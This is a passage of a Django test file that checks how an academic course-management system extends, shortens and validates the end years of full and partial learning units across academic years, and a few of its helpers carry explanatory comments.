06. test_edit_learning_unit_partim_annual_end_gt_old_end_date_date_with_start_date_lt_now
The new end date of the learning unit is none (creation)
07. test_edit_learning_unit_full_annual_end_date_is_none_with_start_date_lt_now
08. test_edit_learning_unit_partim_annual_end_date_is_none_with_start_date_lt_now
09. test_edit_learning_unit_partim_annual_end_date_is_none_with_start_date_lt_now_with_error
The new end date of the learning unit is less than old end date (deletion)
10. test_edit_learning_unit_full_annual_end_date_lt_old_end_date_with_start_date_lt_now
11. test_edit_learning_unit_full_odd_end_date_lt_old_end_date_with_start_date_lt_now
12. test_edit_learning_unit_full_even_end_date_lt_old_end_date_with_start_date_lt_now
13. test_edit_learning_unit_partim_annual_end_date_lt_old_end_date_with_start_date_lt_now
"""
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.setup_academic_years()
cls.learning_container_year_course = cls.setup_learning_container_year(
academic_year=cls.starting_academic_year,
container_type=learning_container_year_types.COURSE
)
cls.number_classes = 5
cls.entity_version = EntityVersionFactory(start_date=datetime.now(), end_date=datetime(3000, 1, 1))
cls.entity = cls.entity_version.entity
def test_edit_learning_unit_full_annual_end_date_gt_old_end_date_with_start_date_gt_now(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year + 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 3)
expected_end_year = AcademicYearFactory(year=end_year.year + 3)
list_of_expected_learning_unit_years = list(range(start_year.year, expected_end_year.year + 1))
learning_unit_full_annual = self.setup_learning_unit(
start_year=start_year,
end_year=end_year,
)
self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.ANNUAL
)
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(expected_end_year.year)
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
list_of_learning_unit_years = _get_list_years_learning_unit(learning_unit_full_annual)
self.assertEqual(list_of_learning_unit_years, list_of_expected_learning_unit_years)
def test_edit_learning_unit_partim_annual_end_date_gt_old_end_date_with_start_date_gt_now(self):
start_year_full = AcademicYearFactory(year=self.starting_academic_year.year + 1)
end_year_full = AcademicYearFactory(year=self.starting_academic_year.year + 6)
start_year_partim = AcademicYearFactory(year=self.starting_academic_year.year + 2)
end_year_partim = AcademicYearFactory(year=self.starting_academic_year.year + 3)
excepted_end_year_partim = AcademicYearFactory(year=end_year_partim.year + 2)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year_full, end_year=end_year_full)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year_partim, end_year=end_year_partim)
self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
list_of_expected_learning_unit_years_full = list(range(start_year_full.year, end_year_full.year + 1))
list_of_expected_learning_unit_years_partim = list(
range(start_year_partim.year, excepted_end_year_partim.year + 1)
)
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(excepted_end_year_partim.year)
edit_learning_unit_end_date(learning_unit_partim_annual, academic_year_of_new_end_date)
list_of_learning_unit_years_full = _get_list_years_learning_unit(learning_unit_full_annual)
list_of_learning_unit_years_partim = _get_list_years_learning_unit(learning_unit_partim_annual)
self.assertEqual(len(list_of_learning_unit_years_full), len(list_of_expected_learning_unit_years_full))
self.assertEqual(list_of_learning_unit_years_partim, list_of_expected_learning_unit_years_partim)
def test_edit_learning_unit_full_annual_end_date_gt_old_end_date_with_start_date_lt_now(self):
start_year_full = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year_full = AcademicYearFactory(year=self.starting_academic_year.year + 1)
expected_end_year_full = AcademicYearFactory(year=end_year_full.year + 2)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year_full, end_year=end_year_full)
self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.ANNUAL
)
list_of_expected_learning_unit_years = list(range(start_year_full.year, expected_end_year_full.year + 1))
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(expected_end_year_full.year)
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
list_of_learning_unit_years = _get_list_years_learning_unit(learning_unit_full_annual)
self.assertEqual(list_of_learning_unit_years, list_of_expected_learning_unit_years)
def test_edit_learning_unit_partim_annual_end_gt_old_end_date_date_with_start_date_lt_now(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 3)
end_year_partim = AcademicYearFactory(year=self.starting_academic_year.year + 1)
excepted_end_year_partim = AcademicYearFactory(year=end_year_partim.year + 2)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year_partim)
list_of_learning_unit_years_annual = self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
list_of_expected_learning_unit_years_full = []
list_of_expected_learning_unit_years_partim = []
for learning_unit_year_expected in list_of_learning_unit_years_annual:
if learning_unit_year_expected.is_partim():
list_of_expected_learning_unit_years_partim.append(learning_unit_year_expected.academic_year.year)
else:
list_of_expected_learning_unit_years_full.append(learning_unit_year_expected.academic_year.year)
list_of_expected_learning_unit_years_partim.append(learning_unit_partim_annual.end_year.year + 1)
list_of_expected_learning_unit_years_partim.append(learning_unit_partim_annual.end_year.year + 2)
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(excepted_end_year_partim.year)
edit_learning_unit_end_date(learning_unit_partim_annual, academic_year_of_new_end_date)
list_of_learning_unit_years_full = _get_list_years_learning_unit(learning_unit_full_annual)
list_of_learning_unit_years_partim = _get_list_years_learning_unit(learning_unit_partim_annual)
self.assertEqual(list_of_learning_unit_years_full, list_of_expected_learning_unit_years_full)
self.assertEqual(list_of_learning_unit_years_partim, list_of_expected_learning_unit_years_partim)
def test_edit_learning_unit_full_annual_end_date_is_none_with_start_date_lt_now(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 4)
expected_end_year = AcademicYearFactory(year=end_year.year + 2)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.ANNUAL
)
list_of_expected_learning_unit_years = list(range(start_year.year, expected_end_year.year + 1))
academic_year_of_new_end_date = None
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
list_of_learning_unit_years = _get_list_years_learning_unit(learning_unit_full_annual)
self.assertEqual(list_of_learning_unit_years, list_of_expected_learning_unit_years)
def test_edit_learning_unit_partim_annual_end_date_is_none_with_start_date_lt_now(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 6)
partim_end_year = AcademicYearFactory(year=self.starting_academic_year.year + 4)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=partim_end_year)
self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
with self.assertRaises(IntegrityError):
edit_learning_unit_end_date(learning_unit_partim_annual, None)
def test_edit_learning_unit_partim_annual_end_date_is_none_with_start_date_lt_now_with_error(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 4)
partim_end_year = AcademicYearFactory(year=self.starting_academic_year.year + 2)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=partim_end_year)
self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
academic_year_of_new_end_date = None
with self.assertRaises(IntegrityError):
edit_learning_unit_end_date(learning_unit_partim_annual, academic_year_of_new_end_date)
def test_edit_learning_unit_full_annual_end_date_lt_old_end_date_with_start_date_lt_now(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 6)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.ANNUAL
)
list_of_expected_learning_unit_years = []
for learning_unit_year in list(LearningUnitYear.objects.all()):
list_of_expected_learning_unit_years.append(learning_unit_year.academic_year.year)
list_of_expected_learning_unit_years = sorted(list_of_expected_learning_unit_years)
list_of_expected_learning_unit_years.pop()
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(
learning_unit_full_annual.end_year.year - 1
)
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
list_of_learning_unit_years = _get_list_years_learning_unit(learning_unit_full_annual)
self.assertEqual(sorted(list_of_learning_unit_years), list_of_expected_learning_unit_years)
def test_edit_learning_unit_full_odd_end_date_lt_old_end_date_with_start_date_lt_now(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 6)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.BIENNIAL_ODD
)
list_of_expected_learning_unit_years = []
for learning_unit_year in list(LearningUnitYear.objects.all()):
list_of_expected_learning_unit_years.append(learning_unit_year.academic_year.year)
list_of_expected_learning_unit_years = sorted(list_of_expected_learning_unit_years)
year_to_remove = list_of_expected_learning_unit_years.pop()
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(
year_to_remove - 1
)
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
list_of_learning_unit_years = _get_list_years_learning_unit(learning_unit_full_annual)
self.assertEqual(sorted(list_of_learning_unit_years), list_of_expected_learning_unit_years)
def test_edit_learning_unit_full_even_end_date_lt_old_end_date_with_start_date_lt_now(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 6)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.BIENNIAL_EVEN
)
list_of_expected_learning_unit_years = []
for learning_unit_year in list(LearningUnitYear.objects.all()):
list_of_expected_learning_unit_years.append(learning_unit_year.academic_year.year)
list_of_expected_learning_unit_years = sorted(list_of_expected_learning_unit_years)
year_to_remove = list_of_expected_learning_unit_years.pop()
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(
year_to_remove - 1
)
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
list_of_learning_unit_years = _get_list_years_learning_unit(learning_unit_full_annual)
self.assertEqual(sorted(list_of_learning_unit_years), list_of_expected_learning_unit_years)
def test_edit_learning_unit_partim_annual_end_date_lt_old_end_date_with_start_date_lt_now(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 6)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
list_of_learning_unit_years_annual = self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
list_of_expected_learning_unit_years_full = []
list_of_expected_learning_unit_years_partim = []
for learning_unit_year_expected in list_of_learning_unit_years_annual:
if learning_unit_year_expected.is_partim():
list_of_expected_learning_unit_years_partim.append(learning_unit_year_expected.academic_year.year)
else:
list_of_expected_learning_unit_years_full.append(learning_unit_year_expected.academic_year.year)
list_of_expected_learning_unit_years_partim = sorted(list_of_expected_learning_unit_years_partim)
year_to_remove = list_of_expected_learning_unit_years_partim.pop()
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(
year_to_remove - 1
)
edit_learning_unit_end_date(learning_unit_partim_annual, academic_year_of_new_end_date)
list_of_learning_unit_years_full = _get_list_years_learning_unit(learning_unit_full_annual)
list_of_learning_unit_years_partim = _get_list_years_learning_unit(learning_unit_partim_annual)
self.assertEqual(len(list_of_learning_unit_years_full), len(list_of_expected_learning_unit_years_full))
self.assertEqual(sorted(list_of_learning_unit_years_partim), list_of_expected_learning_unit_years_partim)
def test_edit_learning_unit_full_annual_end_date_with_wrong_partim_end_year(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 6)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
list_partims = self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
learning_unit_full_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_full_annual.save()
learning_unit_partim_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_partim_annual.save()
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(end_year.year - 3)
with self.assertRaises(IntegrityError) as context:
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
self.assertEqual(str(context.exception),
_('The learning unit %(learning_unit)s has a partim %(partim)s with'
' an end year greater than %(year)s') % {
'learning_unit': learning_unit_full_annual.acronym,
'partim': list_partims[1].acronym,
'year': academic_year_of_new_end_date}
)
def test_edit_learning_unit_full_annual_end_date_with_wrong_partim_end_year_and_no_luy(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 6)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
list_partims = self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now[:2],
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
learning_unit_full_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_full_annual.save()
learning_unit_partim_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_partim_annual.save()
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(end_year.year - 3)
with self.assertRaises(IntegrityError) as context:
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
self.assertEqual(str(context.exception),
_('The learning unit %(learning_unit)s has a partim %(partim)s with'
' an end year greater than %(year)s') % {
'learning_unit': learning_unit_full_annual.acronym,
'partim': list_partims[1].acronym,
'year': academic_year_of_new_end_date}
)
def test_edit_learning_unit_full_end_year_max_value_with_partim_end_year_none(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
max_end_year = AcademicYearFactory(year=compute_max_academic_year_adjournment())
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=None)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=None)
list_partims = self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now[:2],
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
learning_unit_full_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_full_annual.save()
learning_unit_partim_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_partim_annual.save()
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(max_end_year.year)
with self.assertRaises(IntegrityError) as context:
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
self.assertEqual(str(context.exception),
_('The learning unit %(learning_unit)s has a partim %(partim)s '
'with an end year greater than %(year)s') % {
'learning_unit': learning_unit_full_annual.acronym,
'partim': list_partims[1].acronym,
'year': academic_year_of_new_end_date}
)
def test_edit_learning_unit_full_end_year_max_value_with_partim_end_year(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year)
max_end_year = AcademicYearFactory(year=compute_max_academic_year_adjournment())
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=None)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=None)
list_partims = self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
learning_unit_full_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_full_annual.save()
learning_unit_partim_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_partim_annual.save()
self._edit_lu(learning_unit_partim_annual, max_end_year.year)
self._edit_lu(learning_unit_full_annual, max_end_year.year)
def test_edit_learning_unit_full_end_year_none_value_with_partim_end_year(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year)
max_end_year = AcademicYearFactory(year=compute_max_academic_year_adjournment())
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=max_end_year)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=max_end_year)
list_partims = self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
learning_unit_full_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_full_annual.save()
learning_unit_partim_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_partim_annual.save()
with self.assertRaises(IntegrityError) as context:
edit_learning_unit_end_date(learning_unit_partim_annual, None)
self.assertEqual(str(context.exception),
_('The selected end year (%(partim_end_year)s) is greater '
'than the end year of the parent %(lu_parent)s') % {
'partim_end_year': NO_PLANNED_END_DISPLAY,
'lu_parent': learning_unit_full_annual.acronym
})
def test_shorten_and_extend_learning_unit_partim_end_year_to_none(self):
start_year_full = AcademicYearFactory(year=self.starting_academic_year.year)
end_year_full = AcademicYearFactory(year=compute_max_academic_year_adjournment())
generator_learning_container = GenerateContainer(start_year=start_year_full, end_year=end_year_full)
generator_learning_container.learning_unit_partim.end_year = None
generator_learning_container.learning_unit_partim.save()
excepted_end_year = start_year_full.year + 2
self._edit_lu(generator_learning_container.learning_unit_partim, excepted_end_year)
excepted_end_year += 2
self._edit_lu(generator_learning_container.learning_unit_partim, excepted_end_year)
with self.assertRaises(IntegrityError):
self._edit_lu(generator_learning_container.learning_unit_partim, None)
def test_edition_learning_extend_with_related_tables(self):
start_year_full = AcademicYearFactory(year=self.starting_academic_year.year)
end_year_full = AcademicYearFactory(year=start_year_full.year + 6)
generator_learning_container = GenerateContainer(start_year=start_year_full, end_year=end_year_full)
excepted_end_year = end_year_full.year + 2
self._edit_lu(generator_learning_container.learning_unit_full, excepted_end_year)
last_generated_luy = LearningUnitYear.objects.filter(
learning_unit=generator_learning_container.learning_unit_full
).order_by('academic_year').last()
last_container = last_generated_luy.learning_container_year
self._assert_entity_container_year_correctly_duplicated(generator_learning_container.entities, last_container)
last_generated_component = LearningComponentYear.objects.filter(learning_unit_year=last_generated_luy).last()
self.assertEqual(
last_generated_luy.learning_container_year,
last_generated_component.learning_unit_year.learning_container_year
)
self._assert_learning_classes_correctly_duplicated(
last_generated_component,
generator_learning_container.generated_container_years[0].nb_classes
)
def _assert_learning_classes_correctly_duplicated(self, component, expected_nb_classes):
self.assertEqual(LearningClassYear.objects.filter(learning_component_year=component).count(),
expected_nb_classes)
def _assert_entity_container_year_correctly_duplicated(self, expected_entities, duplicated_container):
diff = set(expected_entities) - set(duplicated_container.get_map_entity_by_type().values())
self.assertEqual(diff, set())
def _create_full_learning_unit(self):
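        # Helper: builds a full annual learning unit spanning the future academic
        # years, attaches learning components (with classes) to each year, and
        # returns (end_year, learning_unit, learning_unit_years) for the tests below.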
start_year_full = AcademicYearFactory(year=self.starting_academic_year.year)
end_year_full = AcademicYearFactory(year=start_year_full.year + 6)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year_full, end_year=end_year_full)
learning_unit_years = self.setup_list_of_learning_unit_years_full(
self.list_of_academic_years_after_now,
learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.ANNUAL
)
_create_learning_component_years(learning_unit_years, self.number_classes)
return end_year_full, learning_unit_full_annual, learning_unit_years
def test_shorten_and_extend_learning_unit(self):
end_year_full, learning_unit_full_annual, _ = self._create_full_learning_unit()
# shorten & extend lu
excepted_end_year = end_year_full.year - 2
self._edit_lu(learning_unit_full_annual, excepted_end_year)
excepted_end_year += 2
self._edit_lu(learning_unit_full_annual, excepted_end_year)
excepted_end_year -= 2
self._edit_lu(learning_unit_full_annual, excepted_end_year)
excepted_end_year += 3
self._edit_lu(learning_unit_full_annual, excepted_end_year)
excepted_end_year -= 4
self._edit_lu(learning_unit_full_annual, excepted_end_year)
def test_extend_learning_unit_with_wrong_entity(self):
end_year_full, learning_unit_full_annual, learning_unit_years = self._create_full_learning_unit()
# Add outdated entityversion for requirement entity
outdated_entity_version = EntityVersionFactory(end_date=self.starting_academic_year.end_date)
LearningContainerYear.objects.filter(
id__in=[luy.learning_container_year_id for luy in learning_unit_years]
).update(requirement_entity=outdated_entity_version.entity)
excepted_end_year = AcademicYearFactory(year=end_year_full.year + 3)
with self.assertRaises(IntegrityError) as e:
self._edit_lu(learning_unit_full_annual, excepted_end_year.year)
self.assertEqual(
str(e.exception),
_(
'The entity %(entity_acronym)s does not exist for '
'the selected academic year %(academic_year)s') %
{
'entity_acronym': outdated_entity_version.acronym,
'academic_year': academic_year.find_academic_year_by_year(end_year_full.year + 1)
})
def test_with_partim_fields_that_are_not_reported(self):
start_academic_year = AcademicYearFactory(year=self.starting_academic_year.year)
lu_full = self.setup_learning_unit(start_year=start_academic_year,
end_year=self.list_of_academic_years_after_now[3])
lu_partim = self.setup_learning_unit(start_year=start_academic_year,
end_year=start_academic_year)
lu_year_partims = self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now[:4],
learning_unit_full=lu_full,
learning_unit_partim=lu_partim
)
for partim in lu_year_partims[2:]:
partim.delete()
lu_year_partims[1].attribution_procedure = attribution_procedure.INTERNAL_TEAM
lu_year_partims[1].save()
lu_year_partims[1].learning_container_year.is_vacant = True
lu_year_partims[1].learning_container_year.team = True
lu_year_partims[1].learning_container_year.save()
edit_learning_unit_end_date(lu_partim, self.list_of_academic_years_after_now[3])
created_partims = list(
LearningUnitYear.objects.filter(
subtype=learning_unit_year_subtypes.PARTIM
).exclude(id=lu_year_partims[1].id)
)
self.assertEqual(len(created_partims), 3)
for partim in created_partims:
self.assertIsNone(partim.attribution_procedure)
self.assertFalse(partim.learning_container_year.is_vacant)
self.assertTrue(partim.learning_container_year.team)
def _edit_lu(self, learning_unit_annual, excepted_end_year):
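        # Helper: moves the learning unit's end date to `excepted_end_year` (None is
        # treated as "no planned end", i.e. the max adjournment year) and checks that
        # a LearningUnitYear now exists for every year of the new range.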
end_year = learning_unit_annual.end_year.year if learning_unit_annual.end_year else \
compute_max_academic_year_adjournment()
if not excepted_end_year:
new_end_year = compute_max_academic_year_adjournment()
else:
new_end_year = excepted_end_year
excepted_nb_msg = abs(end_year - new_end_year) + 1
list_of_expected_years = list(range(learning_unit_annual.start_year.year, new_end_year + 1))
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(excepted_end_year)
result = edit_learning_unit_end_date(learning_unit_annual, academic_year_of_new_end_date)
self.assertTrue(len(result) >= excepted_nb_msg)
list_of_years_learning_unit = _get_list_years_learning_unit(learning_unit_annual)
self.assertEqual(list_of_years_learning_unit, list_of_expected_years)
self.assertEqual(learning_unit_annual.end_year.year, excepted_end_year)
def test_postpone_end_date_with_cms_data_and_teaching_material(self):
start_year_full = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year_full = AcademicYearFactory(year=self.starting_academic_year.year + 1)
expected_end_year_full = AcademicYearFactory(year=end_year_full.year + 2)
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(expected_end_year_full.year)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year_full, end_year=end_year_full)
luy_list = self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.ANNUAL
)
self.setup_educational_information(luy_list)
last_luy = mdl_luy.find_latest_by_learning_unit(learning_unit_full_annual)
last_luy_teaching_material_count = mdl_teaching_material.find_by_learning_unit_year(last_luy).count()
last_luy_educational_information = build_list_of_cms_content_by_reference(last_luy.id)
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
new_luy = mdl_luy.find_latest_by_learning_unit(learning_unit_full_annual)
new_luy_teaching_material_count = mdl_teaching_material.find_by_learning_unit_year(new_luy).count()
new_luy_educational_information = build_list_of_cms_content_by_reference(new_luy.id)
self.assertEqual(last_luy_teaching_material_count, new_luy_teaching_material_count)
self.assertCountEqual(last_luy_educational_information, new_luy_educational_information)
def test_postpone_end_date_with_external_learning_unit(self):
start_year_full = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year_full = AcademicYearFactory(year=self.starting_academic_year.year + 1)
expected_end_year_full = AcademicYearFactory(year=end_year_full.year + 2)
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(expected_end_year_full.year)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year_full, end_year=end_year_full)
luy_list = self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.ANNUAL
)
for luy in luy_list:
ExternalLearningUnitYearFactory(learning_unit_year=luy, external_acronym="Yolo")
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
new_luy = mdl_luy.find_latest_by_learning_unit(learning_unit_full_annual)
self.assertEqual(new_luy.externallearningunityear.external_acronym, "Yolo")
def test_shorten_end_date_with_external_learning_unit(self):
start_year_full = AcademicYearFactory(year=self.starting_academic_year.year - 3)
end_year_full = AcademicYearFactory(year=self.starting_academic_year.year)
expected_end_year_full = AcademicYearFactory(year=end_year_full.year - 2)
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(expected_end_year_full.year)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year_full, end_year=end_year_full)
luy_list = self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.ANNUAL
)
for luy in luy_list:
ExternalLearningUnitYearFactory(learning_unit_year=luy, external_acronym="Yolo")
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
new_luy = mdl_luy.find_latest_by_learning_unit(learning_unit_full_annual)
self.assertEqual(learning_unit_full_annual.end_year.year, academic_year_of_new_end_date.year)
self.assertEqual(new_luy.externallearningunityear.external_acronym, "Yolo")
def _create_classes(learning_component_year, number_classes):
for _ in range(number_classes):
LearningClassYearFactory(learning_component_year=learning_component_year)
def _create_learning_component_years(learning_unit_years, number_classes=None):
for luy in learning_unit_years:
component = LearningComponentYearFactory(learning_unit_year=luy)
if number_classes:
_create_classes(component, number_classes)
def _get_list_years_learning_unit(learning_unit):
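    # Returns the academic years (plain ints, in chronological order) for which a
    # LearningUnitYear exists for the given learning unit.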
return list(
LearningUnitYear.objects.filter(learning_unit=learning_unit
).values_list('academic_year__year', flat=True).order_by('academic_year')
)
def build_list_of_cms_content_by_reference(reference):
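    # Snapshots the CMS translated texts attached to `reference` as comparable
    # tuples, so tests can assert that educational information survives a
    # postponement of the end date.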
return [
(translated_text.language, translated_text.text_label, translated_text.entity, translated_text.text)
for translated_text in TranslatedText.objects.filter(reference=reference)
]
class TestModifyLearningUnit(TestCase, LearningUnitsMixin):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.setup_academic_years()
cls.other_language = LanguageFactory()
cls.other_campus = CampusFactory()
cls.faculty_remark = "Faculty remark"
cls.my_course = "My course"
def setUp(self):
self.learning_container_year = LearningContainerYearFactory(academic_year=self.starting_academic_year)
self.learning_unit_year = LearningUnitYearFactory(learning_container_year=self.learning_container_year,
subtype=learning_unit_year_subtypes.FULL)
def test_with_no_fields_to_update(self):
old_luy_values = model_to_dict(self.learning_unit_year, exclude="learning_component_years")
old_lc_values = model_to_dict(self.learning_container_year)
update_learning_unit_year_with_report(self.learning_unit_year, {}, {})
self.learning_unit_year.refresh_from_db()
self.learning_container_year.refresh_from_db()
new_luy_values = model_to_dict(self.learning_unit_year, exclude="learning_component_years")
new_lc_values = model_to_dict(self.learning_container_year)
self.maxDiff = None
self.assertDictEqual(old_luy_values, new_luy_values)
self.assertDictEqual(old_lc_values, new_lc_values)
def test_with_learning_unit_fields_to_update(self):
fields_to_update = {
"faculty_remark": self.faculty_remark,
"other_remark": "Other remark"
}
update_learning_unit_year_with_report(self.learning_unit_year, fields_to_update, {})
self.assert_fields_updated(self.learning_unit_year.learning_unit, fields_to_update)
def test_with_learning_unit_year_fields_to_update(self):
fields_to_update = {
